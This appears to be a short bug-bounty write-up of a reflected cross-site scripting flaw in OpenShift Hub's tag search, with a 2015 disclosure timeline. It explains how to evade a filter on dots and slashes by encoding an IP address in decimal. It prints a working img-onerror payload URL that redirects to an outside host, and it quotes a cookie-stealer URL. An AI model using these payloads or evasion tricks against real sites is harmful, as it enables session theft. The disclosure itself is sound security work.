OpenShift is an Open Hybrid Cloud Application Platform by Red Hat that allows developers to quickly develop, host, and scale applications in a cloud environment.
I have found a very simple reflective Cross-Site Scripting vulnerability on https://hub.openshift.com. Tag searching function wasn’t filtered at all, so it was possible to display user cookies like this:
It soon turned out that stealing cookies is not so easy, because using a dot char (“.”) or a forward slash (“/” or “%2f“) resulted in an application error. No: https://lubi.cz/cookie.php?c=document.cookie for me this time…
Furthermore, the lack of dot character means that I could not use an IP address, nor file extension for cookie exfiltration. Even worse, no “http://”, nor “//” schema. But let’s take another look at XSS Filter Evasion Cheat Sheet.
DWORD encoding to the rescue!
- Take an IP address (Google.com – 18.104.22.168) and convert it to decimal (3627733326).
- Set your cookie stealer at your IP address (I used “google.com/?q=” for that).
- Create a payload without a dot char (“.”) or a forward slash (“/” or “%2f“). Only Firefox allowed me to use “http:” schema with those restrictions. Ladies and Gentelman, please welcome:
https://hub.openshift.com/quickstarts/tags/<img src=x onerror=”location=’http:3627733326’+’%3fq=’+domain”>
[19th May 2015] - bug was reported [25th August 2015] - another contact, no response [2nd September 2015] - RedHat's response [3rd September 2015] - partial fix [7th October 2015] - bug was resolved